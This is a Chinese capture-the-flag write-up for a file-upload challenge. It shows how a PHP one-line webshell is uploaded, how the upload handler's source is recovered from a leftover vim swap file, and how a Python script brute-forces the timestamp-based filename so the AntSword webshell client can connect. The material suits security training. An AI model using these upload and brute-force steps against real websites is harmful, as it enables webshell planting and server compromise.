场景打开如下,是一个上传功能
尝试上传一句话木马,成功
但是上传的文件路径不知道
通过目录扫描发现文件.index.php.swp,关于.swp格式文件是异常退出时linux生成的,具体可以百度
使用vim打开
vim -r index.php.swp
查看源码
<?php
if (isset($_POST['submit'])){
$file_path = "uploads/";
$file_name = date("YmdHis") . rand(0,999) . ".php";
move_uploaded_file($_FILES["file"]["tmp_name"], $file_path . $file_name);
echo "上传成功!";
}
发现文件上传后,保存目录为uploads/,文件名为 服务器当前时间+1000以内随机数.php
根据上图可知,上传木马时间为20220221061306
直接写python脚本爆破文件名
# __author__ = Zhengna from requests import * info = '' for i in range(0,1000): url = 'http://challenge-c6c02710cc1e265e.sandbox.ctfhub.com:10800/uploads/20220221061306' + str(i) + '.php' resp = get(url) print(url+"----"+str(resp.status_code)) if resp.status_code == 200: break
成功得到文件上传路径
使用蚁剑连接,成功拿到flag。
微信扫一扫,打赏作者吧~
